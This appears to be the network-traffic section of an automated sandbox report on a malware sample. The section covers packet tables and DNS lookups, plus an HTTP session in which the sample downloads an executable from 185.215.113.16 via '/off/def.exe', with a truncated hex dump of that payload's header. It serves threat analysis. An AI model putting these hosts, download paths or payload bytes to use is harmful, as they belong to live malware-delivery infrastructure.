Dec 30, 2024 15:53:36.797233105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797247887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797261000 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797291994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797372103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797385931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797399998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797416925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797420979 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797430992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797446966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797461033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797476053 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797477961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797487020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797491074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797506094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797521114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797523975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797534943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797554016 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797560930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797570944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797584057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797599077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797616005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797631025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797645092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797655106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797660112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797673941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797688961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797691107 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797702074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797714949 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797718048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797732115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797744989 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797746897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797763109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797772884 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797777891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797791958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797806978 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797811985 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797821045 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797836065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797837019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797851086 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797866106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797873020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797880888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.797902107 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.797920942 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798151016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798166037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798181057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798204899 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798207045 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798248053 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798286915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798301935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798316956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798331022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798346996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798348904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798361063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798376083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798392057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798399925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798403978 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798414946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798429966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798433065 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798444033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798460960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798464060 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798475981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798485041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798491955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798506975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798512936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798521996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798536062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798552036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.798563004 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.798579931 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.841382980 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.842187881 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:46.663021088 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:46.663079023 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:46.663147926 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:46.663492918 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:46.663506031 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.208960056 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:47.303565025 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.303875923 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:47.303900957 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.304939985 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.305071115 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:47.308423996 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:47.308495998 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.360496044 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:47.360515118 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:47.405107975 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:57.213138103 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:57.213205099 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:53:57.213289022 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:57.710428953 CET	49757	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:53:57.710445881 CET	443	49757	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:07.872873068 CET	49724	80	192.168.2.4	2.22.50.131
Dec 30, 2024 15:54:07.878140926 CET	80	49724	2.22.50.131	192.168.2.4
Dec 30, 2024 15:54:07.878256083 CET	49724	80	192.168.2.4	2.22.50.131
Dec 30, 2024 15:54:46.718564034 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:46.718607903 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:46.718702078 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:46.718966007 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:46.718974113 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:47.356467962 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:47.356844902 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:47.356872082 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:47.357228994 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:47.357530117 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:47.357590914 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:47.404505968 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:57.258936882 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:57.259021044 CET	443	50109	142.250.185.68	192.168.2.4
Dec 30, 2024 15:54:57.259079933 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:58.972563028 CET	50109	443	192.168.2.4	142.250.185.68
Dec 30, 2024 15:54:58.972589016 CET	443	50109	142.250.185.68	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 15:52:59.043358088 CET	49720	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:52:59.055368900 CET	53	49720	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:19.443597078 CET	138	138	192.168.2.4	192.168.2.255
Dec 30, 2024 15:53:42.392745972 CET	53	49540	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:42.604625940 CET	53	53077	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:43.558608055 CET	53	59722	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:46.655431986 CET	59740	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:46.655596018 CET	55941	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:46.661999941 CET	53	59740	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:46.662261009 CET	53	55941	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:46.959156036 CET	60828	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:46.959310055 CET	53121	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:48.214291096 CET	51449	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:48.214814901 CET	54043	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:51.412024021 CET	53	60466	1.1.1.1	192.168.2.4
Dec 30, 2024 15:53:52.545762062 CET	54670	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:53:52.545948982 CET	52256	53	192.168.2.4	1.1.1.1
Dec 30, 2024 15:54:00.552877903 CET	53	58413	1.1.1.1	192.168.2.4
Dec 30, 2024 15:54:19.506203890 CET	53	55895	1.1.1.1	192.168.2.4
Dec 30, 2024 15:54:41.932847977 CET	53	49767	1.1.1.1	192.168.2.4
Dec 30, 2024 15:54:42.121378899 CET	53	58375	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 30, 2024 15:53:56.952882051 CET	192.168.2.4	1.1.1.1	c264	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 15:52:59.043358088 CET	192.168.2.4	1.1.1.1	0xcfda	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.655431986 CET	192.168.2.4	1.1.1.1	0xaab1	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.655596018 CET	192.168.2.4	1.1.1.1	0x14e8	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 30, 2024 15:53:46.959156036 CET	192.168.2.4	1.1.1.1	0xa25	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.959310055 CET	192.168.2.4	1.1.1.1	0xeb48	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 30, 2024 15:53:48.214291096 CET	192.168.2.4	1.1.1.1	0x1e60	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:48.214814901 CET	192.168.2.4	1.1.1.1	0xaf4b	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 30, 2024 15:53:52.545762062 CET	192.168.2.4	1.1.1.1	0xb0ef	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:52.545948982 CET	192.168.2.4	1.1.1.1	0x40c8	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:52:59.055368900 CET	1.1.1.1	192.168.2.4	0xcfda	No error (0)	fancywaxxers.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.661999941 CET	1.1.1.1	192.168.2.4	0xaab1	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.662261009 CET	1.1.1.1	192.168.2.4	0x14e8	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 30, 2024 15:53:46.966114044 CET	1.1.1.1	192.168.2.4	0x8cc4	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966520071 CET	1.1.1.1	192.168.2.4	0xeb48	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966520071 CET	1.1.1.1	192.168.2.4	0xeb48	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966535091 CET	1.1.1.1	192.168.2.4	0xa25	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966535091 CET	1.1.1.1	192.168.2.4	0xa25	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966535091 CET	1.1.1.1	192.168.2.4	0xa25	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.966535091 CET	1.1.1.1	192.168.2.4	0xa25	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:46.974699974 CET	1.1.1.1	192.168.2.4	0x5c32	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.974699974 CET	1.1.1.1	192.168.2.4	0x5c32	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:46.974699974 CET	1.1.1.1	192.168.2.4	0x5c32	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:48.013079882 CET	1.1.1.1	192.168.2.4	0xbd77	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.013339996 CET	1.1.1.1	192.168.2.4	0xb90d	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.013339996 CET	1.1.1.1	192.168.2.4	0xb90d	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.013339996 CET	1.1.1.1	192.168.2.4	0xb90d	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221227884 CET	1.1.1.1	192.168.2.4	0x1e60	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221227884 CET	1.1.1.1	192.168.2.4	0x1e60	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221227884 CET	1.1.1.1	192.168.2.4	0x1e60	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221227884 CET	1.1.1.1	192.168.2.4	0x1e60	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221791029 CET	1.1.1.1	192.168.2.4	0xaf4b	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:48.221791029 CET	1.1.1.1	192.168.2.4	0xaf4b	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:52.553791046 CET	1.1.1.1	192.168.2.4	0xb0ef	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:52.556935072 CET	1.1.1.1	192.168.2.4	0x40c8	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:53.400193930 CET	1.1.1.1	192.168.2.4	0x30a3	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:53.403577089 CET	1.1.1.1	192.168.2.4	0x61dc	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:56.940538883 CET	1.1.1.1	192.168.2.4	0x1e8e	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 15:53:56.952821970 CET	1.1.1.1	192.168.2.4	0x3b22	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

https:

js.monitor.azure.com

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49744	185.215.113.16	80	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 15:53:33.567317963 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 30, 2024 15:53:34.267288923 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 30 Dec 2024 14:53:33 GMT Content-Type: application/octet-stream Content-Length: 2828800 Last-Modified: Mon, 30 Dec 2024 14:24:01 GMT Connection: keep-alive ETag: "6772ad01-2b2a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 73 4f 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +sO+`Ui`D @ @ @.rsrcD``@.idata f@gauqjnbh**h@wnfbljro @++@.taggant@`+"+@
Dec 30, 2024 15:53:34.267302990 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267321110 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267390013 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267422915 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267433882 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267513990 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 30, 2024 15:53:34.267524958 CET	1236	IN	Data Raw: 67 39 95 b4 53 17 b2 d4 23 18 8c b4 7b 27 8c b4 5d 39 90 b4 53 17 b2 ba 7b 15 8c b4 59 37 b6 b4 53 24 bc b7 53 76 8c b4 53 14 8c b4 64 39 a3 b4 53 1b 0a c9 53 11 96 be 5e 27 98 df 9a 18 94 4e 61 1a fb cc 53 11 96 26 77 11 8c 24 7c 2a 8c b4 5d 3d Data Ascii: g9S#{']9S{Y7S$SvSd9SS^'NaS&w$\|]=+]1U{Y>Y9S_\SS[([Wy;S$SqSd9SS^'NaS&U$\|]=+]1U{Y>Y9S+]9Sji
Dec 30, 2024 15:53:34.267535925 CET	1236	IN	Data Raw: 5b 17 8c f0 59 f7 95 ba 53 02 94 a2 5c 17 8c 42 5e ff 94 ba 53 76 92 a2 5c 17 8c 7e 5e ff 94 ba 53 5e 95 a6 5e 1b 8c 3a 5e c5 95 ba 53 27 97 be 53 17 8c a9 5c ff 94 ba 53 72 93 a2 5c 17 8c a0 59 ff 94 ba 53 be 95 a2 5c 17 8c fc 57 4a 94 ba 53 75 Data Ascii: [YS\B^Sv\~^S^^:^S'S\Sr\YS\WJSu\^SSXS\S+SST!YSSSSZ]VSS!\/TSSSrS%TYTSSSrS%TS^T+SSSrS%TU
Dec 30, 2024 15:53:34.267548084 CET	1236	IN	Data Raw: 53 8a 8c 5b 5d 21 8c 35 54 b8 95 ba 53 aa 8c 5b 5d 2b 8c 7d 54 b8 95 ba 53 9a 8c 5b 5d 17 8c 5d 54 b8 95 b5 53 ea 8c e5 5c 3a 8c 8d 54 3c 97 e0 53 f2 8c ea 5c 43 8c 65 54 35 96 f5 53 c2 8c 48 59 58 8c 9d 54 3c 97 ff 53 c2 8c c0 58 62 8c a5 54 e2 Data Ascii: S[]!5TS[]+}TS[]]TS\:T<S\CeT5SHYXT<SXbTT^umT T[mT/TYUTSSSBTSS%LTSS1VTSS9BTSSAeTSSM[TSSU`TSSa[TTSijTTSqtT
